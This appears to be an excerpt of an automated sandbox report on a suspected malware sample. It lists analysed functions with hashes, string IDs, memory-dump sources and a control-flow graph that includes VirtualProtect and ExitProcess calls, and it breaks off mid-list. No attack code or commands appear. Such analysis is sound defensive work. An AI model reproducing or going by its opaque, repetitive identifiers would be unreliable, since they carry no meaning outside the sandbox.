                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$L$L$R$W$W$_Q$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                                                      • API String ID: 2949231068-2950237079
                                                                                                      • Opcode ID: 46dfa9fc068951d42a2d85389662fd6b0adc80c023278db210166c48a3045beb
                                                                                                      • Instruction ID: e5c119275da04619315c6eb8f24b3b717d97fc71105f022b490624b362f1f2ee
                                                                                                      • Opcode Fuzzy Hash: 46dfa9fc068951d42a2d85389662fd6b0adc80c023278db210166c48a3045beb
                                                                                                      • Instruction Fuzzy Hash: 2AF1E1B1D092688AF7208A24DC44BEABBB5FB51304F0580FAD84D66281D77D5EC6CF66
                                                                                                      Function 004113D2 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 414COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-215400123
                                                                                                      • Opcode ID: fd33d7c13277b5532703fbad762ca1dbe011e016a7f5e9518007591bf1f7f26e
                                                                                                      • Instruction ID: 6e877e4881d4842609dbb9b68ec071568fd1b37d18a10c25003e8fb7aea8725b
                                                                                                      • Opcode Fuzzy Hash: fd33d7c13277b5532703fbad762ca1dbe011e016a7f5e9518007591bf1f7f26e
                                                                                                      • Instruction Fuzzy Hash: AEF104B1D082688AFB208B24DC447EA7BB1EF55304F1480FAD58D57281DA795FC6CF66
                                                                                                      Function 0041D4BA Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 407COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-215400123
                                                                                                      • Opcode ID: 75c114dbb585c14f738500eef2b037916f9691530b0391bd5474646cf5032eef
                                                                                                      • Instruction ID: 48376463686dfd89e9960b25cef73e11dcbaf67001b0a2c85e897d727351ff4a
                                                                                                      • Opcode Fuzzy Hash: 75c114dbb585c14f738500eef2b037916f9691530b0391bd5474646cf5032eef
                                                                                                      • Instruction Fuzzy Hash: E7F1F1B1D042688AFB248B25CC447EABBB5EF91304F1480FAD44D67281E67D5FC5CBA6
                                                                                                      Function 0041D46C Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 369COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 534 41d46c-41d477 535 41d479-41d483 534->535 536 41d488-41d48e 534->536 538 41d6e8-41d778 call 41d736 535->538 537 41d494-41d4ec call 41d4ba 536->537 543 41d4f3-41d5ba 537->543 548 41d78b-41d7a0 538->548 549 41d77a-41d786 538->549 546 41d5d4-41d5e4 543->546 547 41d5bc-41d5d2 543->547 546->543 550 41d5ea-41d5fd 546->550 551 41d637-41d63e 547->551 554 41d7b3-41d7d2 548->554 555 41d7a2-41d7ae 548->555 552 41da7c-41daa7 VirtualProtect 549->552 550->543 553 41d603-41d613 550->553 556 41d680-41d6cc 551->556 557 41d640-41d66d call 41d66e 551->557 566 41dae7-41daed 552->566 567 41daa9-41dae5 call 41dad7 552->567 561 41d621 553->561 562 41d615-41d61f 553->562 563 41d7e5-41d7f7 554->563 564 41d7d4-41d7e0 554->564 555->552 558 41d6de 556->558 559 41d6ce-41d6d8 556->559 557->538 558->538 559->537 559->558 568 41d62b-41d631 561->568 562->568 570 41d7f9-41d805 563->570 571 41d80a-41d873 563->571 564->552 574 41daf3-41dafa 566->574 567->574 568->551 570->552 575 41da70-41da76 571->575 576 41d879-41d8c3 571->576 578 41db33-41dbd8 call 41dbd9 574->578 579 41dafc-41db2e call 41db1e 574->579 575->552 580 41d8d4-41d8e5 576->580 588 41e07c-41e475 call 41e0ed 578->588 579->588 583 41d986-41d9d7 580->583 584 41d8eb-41d8fb 580->584 594 41d9e5-41da3c 583->594 595 41d9d9-41d9e3 583->595 584->583 587 41d901-41d952 584->587 592 41d954-41d976 587->592 593 41d978 587->593 607 41ed87-41f488 call 41edfc ExitProcess 588->607 608 41e47b-41e601 call 41e5ea 588->608 592->593 597 41d97f 592->597 593->580 600 41da4a 594->600 601 41da3e-41da48 594->601 599 41da54-41da5b 595->599 597->583 602 41da6b 599->602 603 41da5d-41da69 599->603 600->599 601->599 602->575 603->552 616 41e603-41e60d 608->616 617 41e612-41e65d 608->617 620 41e8ce-41e8f5 call 41e8ee 616->620 625 41e65f-41e669 617->625 626 41e66e-41e674 617->626 630 41e8fa 620->630 625->620 628 41e67a-41e6d2 626->628 632 41e6d9-41e7a0 call 41e6ed 628->632 630->630 635 41e7a2-41e7b8 632->635 636 41e7ba-41e7ca 632->636 638 41e81d-41e824 635->638 636->632 637 41e7d0-41e7e3 636->637 637->632 639 41e7e9-41e7f9 637->639 640 41e866-41e8b2 call 41e87e 638->640 641 41e826-41e864 call 41e837 call 41e854 638->641 643 41e807 639->643 644 41e7fb-41e805 639->644 653 41e8c4 640->653 654 41e8b4-41e8be 640->654 641->620 647 41e811-41e817 643->647 644->647 647->638 653->620 654->628 654->653
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 544645111-215400123
                                                                                                      • Opcode ID: 026f15a7e45682077cea75a9cc2a5b3ca1050837ee38f9f03d54f1ec4ca88785
                                                                                                      • Instruction ID: 732a0e3779928746ac982e237d3129a78c80ccd67a66aa874d558139b6f8e287
                                                                                                      • Opcode Fuzzy Hash: 026f15a7e45682077cea75a9cc2a5b3ca1050837ee38f9f03d54f1ec4ca88785
                                                                                                      • Instruction Fuzzy Hash: 39E1E2B1D082688AFB208B25DC447EABBB5EF95304F0440FAD44D67281D67D4FC5CBA6
                                                                                                      Function 0041617F Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 331COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: J3:N$L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 0-1053765562
                                                                                                      • Opcode ID: ef5203d8ffca924d2d65bec46fec95079e820b4b8cfee78041d02681a3c09997
                                                                                                      • Instruction ID: 16061b5e23863303a85c5149118b05c583089c1a2d6a56531cef824e0d33cd45
                                                                                                      • Opcode Fuzzy Hash: ef5203d8ffca924d2d65bec46fec95079e820b4b8cfee78041d02681a3c09997
                                                                                                      • Instruction Fuzzy Hash: B9D1C1B1D052688AF7208B24DC84BEAB7B5FF50314F0540FAD84D9B281E7399ED58F66
                                                                                                      Function 00415B61 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 459nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: be4d9075661a2ffa222d5183df1b3fee75a2fea6124f5dcae91920a27a716299
                                                                                                      • Instruction ID: 20aa4397dd8713b6702d312d0c9dcc1b5f3d2c8d4a7955a2eacaca19c2709c33
                                                                                                      • Opcode Fuzzy Hash: be4d9075661a2ffa222d5183df1b3fee75a2fea6124f5dcae91920a27a716299
                                                                                                      • Instruction Fuzzy Hash: CC02E0B1D046688BEB208A14DC94BEA77B5EF81314F1480FAD88DA6281E73D5ED1CF56
                                                                                                      Function 00416163 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 436COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 0-2907935017
                                                                                                      • Opcode ID: ff0e7291be78a141969072796306604f90473896e016b7677cf7d71727ca02a2
                                                                                                      • Instruction ID: 13992443c63b38d6d55f76ec46e556000429d3e5fdadba09e39b8d38bb078cb3
                                                                                                      • Opcode Fuzzy Hash: ff0e7291be78a141969072796306604f90473896e016b7677cf7d71727ca02a2
                                                                                                      • Instruction Fuzzy Hash: 22F1E0B1D056688BE7208B24DC44BEAB775FF90305F0580FAD84DA7281E7795EC28F66
                                                                                                      Function 00415714 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 429COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: d65694377be2f7d74aa38b5ab4edb8fdb6c62642abe4af7d024b13ad3ea1ce93
                                                                                                      • Instruction ID: f9ccc419b376a65b4e443c4eee07236bd1eb22d2fd8070d236516047f6b3df16
                                                                                                      • Opcode Fuzzy Hash: d65694377be2f7d74aa38b5ab4edb8fdb6c62642abe4af7d024b13ad3ea1ce93
                                                                                                      • Instruction Fuzzy Hash: 2AF111B1D046688BF7208B24DC44BEAB775FF90314F0480FAD84DA6681E77D5EC68B66
                                                                                                      Function 0040D22D Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 421COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 0-2907935017
                                                                                                      • Opcode ID: 0155d7815ac11ace299da1b798a3750e2b19ebaac5bed87151ca9e0b67474f4f
                                                                                                      • Instruction ID: 5205f0f49f6642d11cbfb4c3c9622259d67bff67a50acb99f04a3c09d5b5acdf
                                                                                                      • Opcode Fuzzy Hash: 0155d7815ac11ace299da1b798a3750e2b19ebaac5bed87151ca9e0b67474f4f
                                                                                                      • Instruction Fuzzy Hash: C1F1E2B1D042688AF7208B64DC44BEAB775EF90314F1540FAD84DAA281E73D9EC5CB66
                                                                                                      Function 00415A86 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 416nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
